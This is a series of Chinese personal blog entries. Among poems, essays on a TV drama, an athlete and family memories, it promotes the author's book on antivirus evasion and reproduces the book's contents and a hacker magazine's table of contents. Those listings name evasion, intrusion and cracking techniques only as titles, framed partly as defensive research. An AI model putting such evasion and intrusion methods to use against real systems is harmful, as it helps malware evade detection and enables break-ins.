题记：“暮琼”意为绚丽美好、犹如仙境的夜幕。

风清月朗    

 A1Pass 作   

晓珲斗晨露，

清魂惊夜风。

寒月吟春雪，

落星醉暮琼。

作者诠释：

        这首诗是我为自己的字“暮琼”而作，我所期望的人生便是如此。这里只做字面解释，而不示意。

第一句：清晨里，一块宝玉的身上凝结着露珠。

第二句：这露珠似乎因其纯洁的魂魄惊动了夜风所得。

第三句：寒月生起，地上洒了薄薄的一层春雪，似乎因天上的月亮的吟诵而烁烁生光。

第四句：在犹如仙境的夜幕里，满天星斗犹如从天而降，摇闪不定，似乎被这暮色所陶醉。

题记：我的“处女作”已经上市了，这是国内第一本详细介绍免杀技术的图书。

注：以下均为稿件预审之前的信息，与实际图书内容可能会有非常小的差异。

想购买的朋友可以去《黑客X档案》官方淘宝小店、参考相关官方公告或拨打各地经销商电话。

书名：《黑客免杀入门》      作者：任晓珲[EST]

状态：已经上市！！                   
定价：32元（240页，140千字）                     
简介：                     
      现在的网络病毒木马横行，每天都有数百种新型病毒与木马出现，而这其中相当大的一部分其实就是经过骇客们免杀处理的变种。因此为了使想研究免杀技术的病毒防御工作者与黑客技术爱好者更加透彻与系统的了解免杀技术，我在黑客X档案的支持下写了这本书，意在给需要它的人一个详尽的参考，并对免杀技术做一个比较系统的阐述。                      
     《黑客免杀入门》是现在国内仅有的几本免杀技术书籍之一。鉴于免杀技术的性质与其它已上市图书的特点，本书除了详尽的介绍了免杀方法外，更兼顾了免杀原理与思路突破的介绍，并驳斥了网络与书本上关于免杀技术的一些错误理论，而且对圈内的部分模糊概念作了详尽的澄清，真正做到了一些具有突破性质的原理介绍，作者之所以下如此大的精力研究这些，只是为争取使本书的读者更加透彻的了解免杀技术。                     
      除此之外，书中使用简单易懂的语言阐述了现在某些专业杀毒防毒书籍中都未曾提到起的一些珍贵资料，使您在反向更加了解现有免杀方法的优点与缺点。因此，相信本书会成为一本初学者与高手都认为物有所值的著作，更相信本书会使您爱上免杀技术。                        
                   
涉及内容：                     
    各种免杀技术、手动脱壳、改壳、汇编、简单的逆向工程、汉化等                       
                   
适合读者：                      
1、对杀毒或黑客技术感兴趣的朋友。                     
这本书将带领您进入免杀这个没有硝烟的智力战场。                     
2、免杀爱好者。                       
这本书将是您很好的参考手册                     
3、电脑病毒防御工作人员。                     
正可谓知己知彼，百战不殆！在您了解了各种免杀原理与思想后，相信会帮助您在杀毒软件发展与创新方面快速取得灵感。                     
4、对软件加密、解密感兴趣的朋友。

推荐序：

事物总是这样发展，有矛就必然有盾，矛盾的存在，让缤纷世界的发展充满着无限生机，又赋充满无限生机的万物予灵性。站在客观的角度，我们很难说在矛与盾的争锋中谁是对的，谁是主导。然而，狼的存在，让鹿开始选择锻炼奔跑，自然选择会让孱弱的个体在生存竞争中被淘汰，留下的狼和鹿都越来越矫健。于是，我们看见这场较量，让双方都得到了有效的进化，这便是天演，便是自然法则。              网络安全技术亦是如此。失去了免杀技术而只有反病毒的世界，所谓“发展”和“提高”便都成为了空虚的概念。因为只有在不断的斗争中，矛盾才使得这个世界走向高远，矛盾才使得这些抽象的概念具体化。研究免杀技术，并不是为了破坏网络安全而使病毒泛滥，从网络安全研究者的角度，它有两个意义：              第一，提高个人技术，拓展知识面。通过对免杀技术的研习，剖析程序的内部构造，可以让我们对病毒木马等恶意程序的运作原理的认识更加理性化，从而，在今后的防范和手工清除方面提供实质性的技术基础。              第二，推动技术的发展，富有科研价值。研究如何免杀，同样对反病毒技术的提高和发展有一种鞭策和推动的作用。技术的发展在于从两个对立的角度不断变换着思考，这个工作不仅是黑帽子的本职，也是白帽子们需要做的事。              有着这样的意义，也就有着这样一本书。我们期望它用谦逊的口吻，带着热忱的学习者们循序渐进的步入免杀技术的殿堂，从而为中国的网络安全事业添砖加瓦。             技术的积累是一个漫长的过程，所以这本书并没有宣扬那种一步登天后便平步青云的错误学习思想，而是仅从一个略熟悉的角度，引导那些初学者们开始探索这个领域，充当一把为大家开启免杀学习之门的钥匙。尔后，继续学习道路依然漫长，只有带着恒心和毅力坚持走下去，信念才会点燃成功的曙光。         凡事都有艰难的过程，宝剑锋从磨砺出，梅花香自古寒来，愿各位学习者在坎坷求学路上勇敢拼搏。                   此致      共勉                                                          冰血封情 [E.S.T]                                                    戊子年七月廿一日午时于断弦寒香阁

图书封面：

图书目录：

一、和我一起来认识免杀 1.1 什么是免杀 1.2 免杀的发展史 1.3 免杀能做什么   二、组建试验环境 2.1 我们需要什么 2.2 安装虚拟机 2.2.1 影子系统的安装与使用 2.2.2 VMware虚拟机的安装与使用 2.3 杀毒软件的安装与设置 2.4 认识我们的免杀利器   三、免杀基础知识 3.1 杀毒软件的原理与杀毒技术简介 3.1.1 杀毒软件工作原理 3.1.2 基于文件扫描的杀毒技术 3.1.3 基于内存扫描的杀毒技术 3.1.4 杀毒技术前沿 3.1.5 杀毒技术展望 3.2 了解PE文件 3.2.1 什么是PE文件 3.2.2 认识PE文件 3.3 文件免杀原理 3.3.1 什么是特征码 3.3.2 文件免杀原理 3.4工具脱壳技巧 3.4.1 专用脱壳工具脱壳 3.4.2 使用通用脱壳工具 四、特征码免杀技术 4.1 战前热身——脚本木马免杀实例 4.1.1理想状态下的免杀 4.1.2脚本木马也要玩“花指令” 4.2 特征码定位原理 4.2.1 CCL特征码定位原理 4.2.2 MYCCL特征码定位原理 4.2.3 MultiCCL特征码定位原理 4.3 脚本木马定位特征码技巧 4.4 MYCCL查找文件特征码 4.4.1 MYCCL的典型应用 4.4.2 针对MYCCL的一点思考 4.5 MYCCL查找内存特征码 4.6 MultiCCL使用技巧 4.6.1 MultiCCL介绍 4.6.2 MultiCCL定位文件特征码 4.6.3 MultiCCL定位内存特征码 4.6.4 由MultiCCL想到的 4.7 特征码修改方法 4.7.1 简单的特征码修改 4.7.2 特征码修改进阶 五、其他免杀技术 5.1 改文件头免杀 5.1.1 操作篇 5.1.2 原理篇 5.2 入口点免杀技术 5.2.1 操作篇 5.2.2 原理篇 5.3 使用Vmprotect加密 5.3.1 操作篇 5.3.2 原理篇 5.4 Restorator资源修改 5.4.1 操作篇 5.4.2 原理篇 5.5 Overlay附加数据处理及应用 5.5.1 操作篇 5.5.2 原理篇 5.6 Sys免杀修改技巧 5.6.1 sys文件的常见免杀方法 5.6.2 sys文件的手工免杀思路 5.7 补丁在免杀中的应用 5.7.1 操作篇 5.7.2 原理篇 5.8 免杀根基——PE文件介绍 5.8.1 PE文件格式 5.8.2 虚拟内存的简单介绍 5.8.3 PE文件的内存映射 5.9 PE文件中的免杀技术 5.9.1 移动PE文件头位置免杀 5.9.2 输入表移动免杀 5.9.3 输出表移动免杀 5.10 网页木马的免杀技术 5.10.1 脚本木马免杀 5.10.2小论网页木马的免杀   六、免杀与花指令 6.1 什么是花指令 6.2 脚本木马的花指令应用 6.3 花指令根基——了解汇编语言 6.3.1 认识汇编 6.3.2 由汇编语言想到的——通过反汇编添加任意功能 6.4 花指令入门 6.5 花指令在免杀领域的应用 6.5.1 花指令的应用技巧 6.5.2 花指令的修改技巧简介 6.5.3 空白区域寻找与加空白区段 6.6 花指令的高级应用 6.6.1 花指令的提取与快速应用 6.6.2 SEH异常的应用 七、免杀与壳 7.1 什么是壳 7.2 壳的基础知识 7.3 壳在免杀领域的应用 7.3.1 加壳的免杀原理 7.3.2 FreeRes多重加壳 7.4 壳的修改技巧 7.4.1 壳的初级修改 7.4.2 制作通用补丁 7.5 手工脱壳技巧 7.5.1 手工脱壳基础 7.5.2 SFX自解压法脱壳 7.5.3 出口标志法脱dePack壳 7.5.4 单步跟踪法脱壳 7.5.5 经典的ESP定律脱壳 7.5.6 最后一次异常法脱壳 7.5.7 内存镜像法脱壳 7.5.8 模拟跟踪法脱壳 7.5.9 非完美脱壳后的程序修复 八、免杀技术前沿 8.1 杀毒与免杀技术的发展 8.2 启发式杀毒原理 8.2.1 启发式杀毒原理 8.2.2 启发性标志详解 8.3 针对启发式杀毒的免杀方法 8.4 主动防御的原理 8.4.1 初探主动防御 8.4.2 主动防御的原理 8.5 针对主动防御的免杀方法 8.5.1 剖析主动防御的弱点 8.5.2 修改时间攻破卡巴斯基 8.5.3 通过主动防御特征码来突破瑞星主防 8.5.4 手工打造突破主动防御 8.6 与杀毒软件的对抗   九、免杀技术补白 9.1 综合免杀实例 9.1.1 策划安排 9.1.2 设计免杀流程与免杀对策 9.1.3 设计免杀执行方案 9.1.4 按照执行方案执行免杀操作 9.2 免杀中的汉化技术 9.2.1 VB程序的汉化与修改 9.2.2 C程序的汉化与修改 9.2.3 Delphi程序的汉化与修改 9.3 病毒命名规则初探 9.4 关于免杀的几个FAQ

由于版面不够，所以后序编辑部没有加上，我在这里补一下：

后序

“知识本身并没有告诉人们怎样运用它，运用的方法乃在书本之外。”--培根

历时数月，蛰伏地下，终于顺利完成了自己的第一本书。

在写作之余才明白，原来免杀技术是这么的博大精深，才明白仅靠这本书还远远不能将免杀技术介绍完。

这本书所能教给你的知识虽比较全面，但也有限，正像本书的名言里所讲的一样“运用的方法仍在书本之外”，只有各位读者的不断进取与钻研，才会真正掌握免杀的魅力，才会真正的爱上免杀。

对于免杀技术，这本书只讲到了比较浅的应用层修改，并没有涉及到更深的东西或是有关于编译级别的免杀探讨。虽然整本书的定位是一个不可忽视的制约因素，同样免杀技术的高深与整个技术还未走向成熟也是其中不可忽视的前提。

因此当您读完这本书时，我所能保证的就是您已经接受了目前来讲最系统的免杀知识训练，但是我无法保证您能因此而走上高手的路程。因为后期的路还要靠我们并肩一起走……

最后，祝愿支持本书的读者在技术上能有所收获！

参考文献：

[1]黑客X档案，期刊

[2]汇编语言艺术，Randall Hyde 著（陈曙晖 翻译），清华大学出版社，2005年出版

[3]计算机病毒防范艺术，（美）Peter Szor 著（段新海 译），机械工业出版社，2007年出版

[4]精通黑客免杀，黎昭 著，齐鲁电子音像出版社，2008年出版

[5]Windows环境下32位汇编语言（第2版），罗云彬 著，电子工业出版社，2006年出版

[6] www.EvilOctal.com 邪恶八进制信息安全团队技术讨论组（感谢团队给予我的帮助）

[7] www.baidu.com & www.google.cn 百度与谷歌搜索引擎（它们是我永远的老师） 

题记：母亲的伟大就在于她认为自己的付出是快乐的。

       一日锻炼完回校的路上，天色渐晚，不过西边的天仍有余辉，小区里的人基本上都在家看电视或准备晚餐，所以显得多少有些冷清。

       9月的北京还是很热的，我与宿舍一哥们无精打采的往学校走着，也许是刚刚锻炼完都很累，也许什么别的原因，我们都像是若有所思般只是静静的走着，谁也不说话。

       这时我仿佛听到了什么，哇哦！那是多么优美而又熟悉的旋律……

       “他们自由自在生活在那绿色的大森林 ”
       “他们善良勇敢相互都关心” 
       “哦!可爱的蓝精灵” 
       “哦!可爱的蓝精灵”

         ……

        “哈哈……”传来了一阵欢快的笑声……

       我回头看了看，那是一对母女在唱歌，女儿只有5、6岁的样子，母亲显得也很年轻。粉红色点点的发卡与颇有些小女生气息鞋子，让人感觉她与她的女儿就像是一对姐妹，然而她却骑着一辆老旧的破自行车，似乎每登一下都要花费很大的力气。

     “哦!可爱的蓝精灵” 
     “哦!可爱的蓝精灵”    

      随着歌声越来越清晰，她们离我们越来越近了，我看到了那位母亲额头上的汗珠。但她自己像是没有意识到一般，随着歌声夸张的摆着头，而她的女儿则随着歌声的旋律拍着手……

      “他们齐心合力开动脑筋斗败了格格巫 ”
      “他们唱歌跳舞快乐多欢心”
      “在那山的那边海的那边”
      “有一群蓝精灵” 

       这时她们已经到了离我们很近的地方，那位母亲昂着头，微闭着眼睛，额头上的汗留下脸颊，流过略带微笑的嘴角，喘着粗气与女儿依然唱着那首歌。这时我才意识到她们骑的很慢……

       这时一辆黑色轿车急驰而来，而那母亲依然微闭着眼睛，摇摆不定的车把使我马上就要喊出来了！

       正当这时“嗡……”的一声，黑色轿车已经疾驰而过，母女俩的车子晃了一下，伴随着歌声慢慢地远去了……
       “他们活泼又聪明他们调皮又伶俐” 
       “他们自由自在生活在那绿色的大森林” 
       “他们善良勇敢相互都关心” 
       “哦!可爱的蓝精灵” 
       “哦!可爱的蓝精灵”

        …………

         我长吁了一口气，为她们母女俩捏了一把汗。

         这突然使我想起了自己小时候坐在母亲后车架上唱歌的情形，记得母亲也曾陪我一起唱着那一只只旋律优美的歌曲，记得母亲骑车也总被人超车，当然也记得母亲那辆破旧的自行车。但是唯一没有印象的，就是母亲骑车时的脸、母亲骑车时的额头，以及母亲骑车时的汗水……

        想到这里我自己情不自禁的哼起了蓝精灵：

      “哦!可爱的蓝精灵” 
      “哦!可爱的蓝精灵”   

      “嗯……好久不唱了，歌词都忘了。”我对与我同行的哥们说。

      “多么好听的一首歌曲呀，你刚才看见了吗？那个母亲显得是那么的快乐！”我指着母女俩远去的方向说。

       我宿舍哥们听后笑了笑，我们便继续走向去学校的小路了……

       
蓝精灵

在那山的那边海的那边
有一群蓝精灵
他们活泼又聪明他们调皮又伶俐
他们自由自在生活在那绿色的大森林
他们善良勇敢相互都关心
哦!可爱的蓝精灵
哦!可爱的蓝精灵
他们齐心合力开动脑筋斗败了格格巫
他们唱歌跳舞快乐多欢心
在那山的那边海的那边
有一群蓝精灵
他们活泼又聪明他们调皮又伶俐
他们自由自在生活在那绿色的大森林
他们善良勇敢相互都关心
哦!可爱的蓝精灵
哦!可爱的蓝精灵
他们齐心合力开动脑筋斗败了格格巫
他们唱歌跳舞快乐多欢心

题记：谦虚谨慎是每个人应有的学习态度，尊重他人也是每个人都应具备的基本做人准则。

       对于我前些天在邪恶八进制上发表的一篇文章“由《说C·指针》想到的”所引起的评论简直叫我大跌眼镜！我一没装B卖傻，二没杀人犯法，居然有人发表反讽我的评论！

       本人毛头小子一个，还没进入社会，也没什么经验，所以还天真的回复了那条反讽我的评论，最后那位大侠回了一句“难道你没看出来我这是反讽吗？”

       由于EST里牛人众多，一时间还真搞得俺晕头转向，另外在技术版块反驳这种问题也显得很小家子气，所以我很低调的回复后这件事在论坛里就算过去了……

       有时候我也时不时的看看这篇文章，我越看越感觉得是读者并没有理解我这篇文章的意思！说得直白点，那位大侠并没有仔细看我的文章就妄下结论！首先有两句话他肯定没看见：

1、“公认的指针定义：‘指针就是一个值为其他内存地址的内存变量。’”

2、“如果我们非要强加给它一个类型的话，那么……”

       也就是说我其实并没有讨论指针的类型，而是通过数组来比喻指针，只是以指针类型为引子罢了。而这个想法是我看完EST论坛前辈文章里的一句话引发的联想而已。

       写这篇文章的目的一是让一些朋友通过这种对比更加了解指针，二是这毕竟是一种新思路，不是吗？

       因此每当我想到那位朋友写下充满讽刺的评论时我就感到很受伤！首先我是一个学生，学生本身就是允许犯错的。其次我平时都已低调为主，从不显山漏水，更没得罪过谁，试问那位所谓的牛人对这样一个比你小5、6岁的弟弟的反讽是何用意？我伤着您了，还让您看着不爽了？

       如果您是热心肠，看出了我的错误您可指出来，没必要反讽！如果您有技术，您可以利用您在EST的权限（版主帐号或Shell）将我的帖子移走或干脆删除！

       如果您没有权利操作我的帖子，从侧面就证明您的技术还没有达到您想象当中的那么强悍！所以如果您要指出错误，那么就请直说！如果您要看着我不爽，您可以以读者的角度指责我这篇文章的软肋！这些我都可以接受……

       但是您偏偏用了个什么反讽……

       我什么都不是，您反讽完我难道能因此得到些什么不成？

       好的，如果这些都不成立，那么请问这是否就应该属于您个人的人品问题了呢？

       谨以此文献给那位“牛人”，我的网友以及我自己，要时刻注意尊重他人！网络与社会一样，它就是一面镜子，只有你尊重别人，你才会得到别人的尊重，否则也只能成为别人唾骂的对象……

题记：几个月前写的一篇文章，最近被发表了，无奈发现几处写错了-_-!（用词问题，并非原理性问题）

黑客线报

菜鸟学堂
菜鸟师徒行——肉鸡保卫战（下）                    作者：周五杰（阿布）

QQ宝典
利用QQ飞车地址提权，获得QQ多种权限　　 作者：YouXi结S
免费装扮漂亮可爱的QQ空间　　　　　　　　作者：无敌小龙
鲜人为知的免费黄钻活动　　　　　　　　　 作者：红莲骑士
找回QQ好友有新招　　　　　　　　　　　　作者：雷克斯de眼泪
超级无敌破解QQ加密空间查看相册　　　　　作者：懪 愺ゞ☆（lyhack8）

网吧黑客
破解PUBWIN4，网费任意加　　　　　　　　 作者：magic.6_star
谁说没有免费的“午餐”　　　　　　　　　 作者：矛后盾
再来破解Pubwin4　　　　　　　　　　　　　作者：0℃幻影

傻瓜黑客
免费使用，还有金山毒霸　　　　　　　　　　　　　作者：飞仙
如何禁止别人来使用U盘　　　　　　　　　　　　　作者：~~啊贵~~（Hack）
简单社会工程学之亲身体验　　　　　　　　　　　　作者：MISHELL[噩靈网络]
论坛我就要免费的——免费打造属于自己的个人论坛　作者：笨小孩
教小菜免费得到付费的手机彩铃　　　　　　　　　　作者：qooitry
深入浅出之Windows共享　　　　　　　　　　　　　作者：BaseNet
针对未知U盘病毒最安全的打开方法　　　　　　　　作者：梁天爽
文件的另类隐藏　　　　　　　　　　　　　　　　　作者：杨税令
网站投票大家刷　　　　　　　　　　　　　　　　　作者：梁天爽
QQ钓鱼？从GOOGLE说起　　　　　　　　　　　　作者：无敌小龙

牧马记
和我一起来试用小锋远程控制　　　　　　　　　作者：痛并快乐着
让shift后门穿透系统文件保护　　　　　　　　　作者：bookding
为木马的入侵开路　　　　　　　　　　　　　　作者：痛并快乐着

毒笼
设置文件权限让驱动级木马露马脚　　　　　　　作者：swan
Autorun.inf光荣复活　　　　　　　　　　　　　作者：DDNP＆飘来飘去[B.B.E]

侠隐仙踪
鬼网超生（五）宿命，即便是悲哀也要勇敢的面对　作者：海边一粒沙

一个人的战争
菜鸟也来玩phpwind、discuz、sablog最新漏洞　　作者：落叶纷飞[J.L.S.T]
记一次某彩票站的沦陷　　　　　　　　　　　　作者：frb
对某整站系统的入侵　　　　　　　　　　　　　作者：x140m1n6[D.R.T]＆冰sugar[D.R.T]
Joomla助我轻松拿webshell　　　　　　　　　　作者：坏人咖啡
公司网站历游记　　　　　　　　　　　　　　　作者：逍遥复仇
入侵androidcn中文网　　　　　　　　　　　　　作者：清原长风
对某黑客站点的一次渗透　　　　　　　　　　　作者：网络小子＆冰sugar[D.R.T]

安全第一
我有金钟罩，数据不会掉　　　　　　　　　　　作者：无敌小龙（张博）
菜鸟初学Windows帐户密码安全　　　　　　　　作者：BaseNet
和我一起来认识SSM　　　　　　　　　　　　　作者：xiao0440

黑客研究院
如何防范重复提交数据攻击　　　　　　　　　　作者：才子佳人
对上传漏洞的简要分析　　　　　　　　　　　　作者：3少

神密园
从零开始学破解之（二十四）小菜也做注册机　　作者：Talent Feng
免杀的两条小经验　　　　　　　　　　　　　　作者：txcbg
木马免杀新技巧之壳中改籽　　　　　　　　　　作者：吾有型
简简单单破解汉化TVC　　　　　　　　　　　　作者：阿虚

黑客编程
反弹木马编写之3322域名更新器　　　　　　　　作者：无敌小龙（张博）
QQ游戏大厅多开补丁简单做　　　　　　　　　　作者：林中闲人

主题乐园
菜鸟免杀基础三步走　　　　　　　　　　　　　作者：A1Pass[EST]

补丁铺
对“浅谈输出表免杀”一文的质疑和补充　　　　作者：姬良

寂寞梧桐
菜鸟家园:Skydrive，来自微软的免费5G网络硬盘　作者：张诚
我和X的故事：讲述我和X的故事　　　　　　　　　作者：十豆三十甫寸
呆呆虫问吧

黑客X档案部分代理商联系电话
邮购信息

原贴地址：http://bbs.hackerxfiles.net/thread-116820-1-1.html

题记：大田乃奋也，这使我知道既然要奋斗，就要选择一个足够大的舞台。

“奋斗”感悟之感情篇：

       我感觉整个“奋斗”电视剧的最主要的主题之一就是爱情，所以本文也从感情谈起。杨晓芸、米莱与夏琳巧妙的构造出了三种不同的女人，而陆涛、向南与华子也构造出了三种不同的男性。

       其实剧情中的每一个人都是可圈可点，除了可爱而又董事的小灵仙似乎有些离生活比较远，剩下感觉都离得很近很近，特别是发生于陆涛与向南这两个主角间的各种感情故事……

       我听大人教育孩子关于感情方面说的最多的就是“要是有一见钟情的先处着也行”，当时感觉很可笑，觉得上一辈人还生活在清纯的感情世界里。但是通过“奋斗”使我知道，原来无论这个社会在怎么变，人与人之间的爱情是不会变的。

       每个人都有自己的缺点，例如陆涛的自我、夏琳的自大、向南的没心、晓芸的任性等等，然而他们却始终因为友情与爱情紧紧地被绑在一起，谁也离不开谁。直到最后才懂得了自己对于对方的那种责任，其实我感觉这就是认同并准备包容对方缺点的一种表现，而促使这些成为真正行动的动力源泉就来源于感情。

      “奋斗”从始至终都穿插着两代人之间的曲折爱情，然而与我们这代的爱情相比，上一代爱情有了更多的理解与宽容，这正是经过历练的爱情的标志。只有经过历练的爱情，它才会成熟，才会长久，才会使得除了相爱的两人之外的更多人感受到这份爱情带来的甘甜。

       记得徐志森的一句话“感情世界是你想象出来的世界，……生活在感情世界里的人脚下踩的不是2000元一平米的土地，而是云朵……”我个人认为他这句话值得每个人铭记在心中。爱情会使人失去自我，会使人在最短的时间内改变自己的世界观与人生观，而如果这种改变没有经过一丝一毫控制的话，那么所导致的后果就是悲剧。

       到了故事的最后，陆涛终于叫了路亚迅一声爸爸，但却置自己的亲生父亲于不顾，而且到最后也没交代徐志森的手术结果，我认为这是编剧人生观畸形的一种表现。每个人眼中的世界都不一样，路亚迅与徐志森都将自己眼中真实的世界给予了陆涛，每一个人的经验都非常珍贵，但是为什么最后却得到了完全不一样的结局呢？路亚迅由于从小与陆涛在一起，所以多了一份豁达；徐志森一直与陆涛分离，所以多了一份急切。因此从这里来讲，路亚迅是付出者，而徐志森是获益者。但我感觉徐志森的结局仍然是不公平的……

       从剧情整体来讲，爱情凌驾于友情至上，友情制约着爱情的发展，然而亲情却被放倒了一个最低的位置上。但是我个人认为，亲情是应该最至高无上的！陆涛自始至终除了给家里买了一个3万元的电视，始终都没有顾及到他的母亲、他的养父以及他的亲生父亲的任何感受，在有了自己的事业与爱情后就忘记了家里的一切，如果陆涛是个懂事的孩子，我想徐志森应该可以多活几年。

---------------------对白引用---------------------

陆涛：

“为什么人从感情中什么也学不到？”

徐志森：

“感情是一种本能，本能是不需要学习的，感情更是一团混乱，有一刻，你很冲动，觉得自己能为某人献出一切，另一个时刻，冲动消失了，你也许觉得献出一切不划算。感情无法控制，人们一直试图通过观念控制感情，但并不总是成功的。在古代，人们就不信任感情，知道通过利益维持的婚姻更长久，一般来讲，在书里的爱情比现实中的要多得多。”

“奋斗”感悟之人生篇：

       主人公陆涛的人生离我们太远，但也正因如此，编剧赋予了他一个重要的使命——从更高的角度诠释人生，他诠释出来的人生是理想主义的人生，是编剧心目中的人生。

       这个人生就是“事业与成功只是一堆没有意义的零，只有将它们与家庭这个一结合在一起时才有意义。”于是陆涛抛弃父亲，离开母亲与养父并丢掉“那堆没有意义的零”与夏琳跑到法国去构建他所谓的“一”去了。

       所以个人认为从“奋斗”中看不到有意义的人生，唯一感到比较受启发的是徐志森的一句话：“每个人都只能年轻一次，这是人生最邪恶的地方。”这简单的一句话是我意识到年轻的人生是非常宝贵的，他不像可以存档的游戏可以从来，而是如果你失去了、错过了，就永远都不会回来了……

       其他的不多做评论。

---------------------对白引用---------------------

徐志森：
“每个人都只能年轻一次，这是人生最邪恶的地方。有一天啊，你变老了，你可以不再轻信自己或者别人，你可以逃过很多伤害，但你也因此失去了活力，失去猛得撞向尖刀那种切切实实的灼痛。没错，最终你是得到了平安、世故，那是逃避永恒痛苦的唯一方式。陆涛，我不知道该跟你说什么，我见过你两个女朋友，但我感到，只要你用心，灵珊也可能成为你的女朋友，但我觉得米莱最适合你。今后不管你变成什么样，她都会对你好，她成熟，知道自己要什么。而夏琳呢，夏琳她时髦，也许你也很时髦，所以你们彼此欣赏。 ”

陆涛：
“我爱夏琳，没有她我觉得干什么都提不起精神。 ”

徐志森：
“你不觉得这像鬼迷心窍吗？不错，如果换成是我的话，我也喜欢夏琳。很难找到不喜欢她的理由，是吗？但是别为她改变你自己。我希望你更成功，叫她跟着你的生活节奏走，不然你会因为失去自我而被她控制。 ”

“奋斗”感悟之事业篇： 

       自我创业且不屈不挠的代表人物就是猪头，但是遗憾的是戏中关于猪头创业的描述都是一带而过，让人有些失望，但也完全可以理解。

        而关于对事业的看法，个人还是比较喜欢徐志森的“大商之道”既“生意经”、“刹车”与“小巷思维”。

       剧中对于刹车的描述最为深刻，因此我们可以感觉到一个商业人的不同的头脑（虽然他是虚幻的），而生意经则过于复杂，我也没什么权利评论，所以我们就说说“小巷思维”。

       关于“小巷思维”就是指人们在思考问题是陷入一个像小巷一样窄窄的地方，不进则退，没有回旋余地。这种情况会给人们种种压力，最后使我们失控的几率增大，从而导致整件事情的失败几率增大。

       现实生活中我们确实常常陷入“小巷思维”中去，一味的追求某件事情并给自己设下更多的规则，从而变得越来越不灵活，最后形成恶性循环，直到整件事变成一个只有两种选择的赌博游戏——不进则退。

       因此怎样解决“小巷思维”或怎样避免这种思维的出现就应该是我们考虑的重点。

       单单从编剧来讲，并没有对“小巷思维”做过多的阐述，因此直接在电视中很难找到答案，这个答案只有靠我们自己寻找。

       首先，绝大多数事情不可能只有一种解决方法。

       其次，某些时候我们不可避免的会走入“小巷思维”。

       因此，如果要将负面影响降到最低，就是将“小巷思维”的压力降到最低。因为“小巷思维”所带来的压力会使我们失控，而我们有应该怎样控制失控呢？徐志森已经告诉我们了，那就是刹车！

       当我们已经走入小巷思维并丧失回旋余地时，我们应该先刹车，停下来仔细观察并思考，以此避免失控的局面发生。只要能避免失控，我们就已经将“小巷思维”的影响降至最低了。

       说了一大堆思考方式，并不因为它们很经典，而是因为我认为事业的成败就取决于自己的思考方式。

---------------------对白引用---------------------

徐志森：

拒我所知道啊，在美国参加这种俱乐部的人，都是来自中下阶层的人，那个阶层的生活缺乏回旋的余地呀。就好像在那个窄巷当中行走，不是进，就是退，你甚至无法转身。
徐志森：

再后来，我去了华尔街，在华尔街成功人士多了，各有特点。可是我的注意力啊，并没有摆在成功人士的身上，我把它摆在少数的几个失败的身上。
徐志森：

我就发现啊，这些失败者，尽管他们来自各个不同的阶层，但是他们，他们共同延用了一个特点，那就是小巷思维，不是进，就是退，要么就生意成功，要么我就放弃。没办法啊，由于在这个小巷当中啊，他们不是进就是退，所以很容易造成这种压力，这压力一多了，就容易造成失控，一失控就离失败不远了。后来我就想啊，是什么把人推到这个小巷当中，答案是人们自己啊。
徐志森：

这人们总是想着用最快最好最省力的方法达到这个目的，结果在不知不觉当中，就走入了小巷之中。
徐志森：

陆涛啊，你看我们现在走在哪里？
陆涛：

球场啊。
徐志森：

对，是在球场。那你看看四周，你不觉得在这里走，好像我们往哪里走都可以啊？
陆涛：

是啊。
徐志森：

好了，那我今天给你讲的就是这些。

“奋斗”之最喜欢的人物：

徐志森：个人比较喜欢他，但是这是一个充满争议的人物，因为他与陆涛一样，虽太过于自我，但仍有许多过人之处，所以不做过多评价。

华子：我身边的绝大多数人都喜欢华子，或许是因为他离我们比较近吧。

夏琳母：一位坚强、善良、有原则而又默默付出的母亲才是人们最喜欢的。

灵珊：小灵仙，男生最喜欢的角色了，其他的角色其实都在她之下，但是现实生活中离我们比较远。不过对于她的感觉更多的应该是爱护，而不是爱。

题记：刘翔，一只有脚伤的猎鹰，其实并不影响其飞翔……

      “什么？刘翔退出了比赛？”

      “刘翔因为脚伤退出了比赛，他的伤只有他自己清楚，不过我支持刘翔的选择。”

      “我们看到现场的观众似乎还没能从着热烈的气氛中缓过劲来，充满疑惑的看着记分牌。”

       …………

       这是CCTV主持人解说的一些摘录，从言里言外还是不难发现刘翔的这一举动很难让人接受，赛前他的教练也曾表态他的状态已经恢复过来了，刘翔自己也说他对这场比赛很有信心，并且表示还有“秘密武器”没有用。

       似乎种种猜疑都指向了刘翔今天的表现，赛前他先是进行了两次漂亮的试跑，总计跨了四个栏，然后就露出了疼痛难忍的表情，他为什么要试跑两次？

        而且从CCTV主持的话“他的伤只有他自己清楚”中也可以看出主持人还是持有一点怀疑态度的。

        “我的国家把我送到这里不是为了让我参加比赛，而是为了让我完成比赛！”这句话不知道刘翔听过没，纵然是在严重的脚伤也不至于直接退出比赛，就是走完全程，也要给13亿人一个完整的答复，也要给自己4年辛苦的训练一个完整的答复……

        虽然失望，但是面对自己一直很喜欢的一名运动员我也不想做过多的评价，只希望他一路走好，忘记这次比赛，用以后的成绩给自己与自己的祖国一个满意的答复……

题记：世界上又少了一位伟大的母亲……

       几十年含辛茹苦，一辈子兢兢业业，照顾着那个贫困的家庭，照顾着三个孩子与自己的丈夫。

       儿时丧母，晚年唯一的亲人就是我以去世3年的奶奶，您为人厚道，做人刚正不阿，性格坚强！从来不拿自己的贫困说事，反而处处想着亲戚邻里……

       摸爬滚打拼了一生，两个孩子长大了，也都成家立业了，可正这时您却选择了主动离开，是因为病痛的折磨，还是因为精神上的压力？但是不管怎样，我永远都会记住儿时您对我的照顾！我永远都不会忘记您对我的关爱！我永远都不会忘记您与我奶奶的那份真挚的感情！我更忘不了您对我奶奶的挂念……

       社会人情世故夹杂着太多的因素，我甚至都没能看您最后一眼，只能谨以此献给远在天堂的您，愿您在天堂永宁！您是一位伟大母亲！

题记：比较喜欢的一首歌，按韵律翻译了一下歌词……

转载请注明版权：A1Pass   http://a1pass.blog.163.com/

       今天在网上搜了搜《You raise me up》的中文歌词，有好几个版本，但只是大意翻译，并不能用中文跟着唱出来，很郁闷，所以心血来潮从新翻译了下，可以用中文跟着唱的～～

我翻译的-----                                     -----原来的翻译

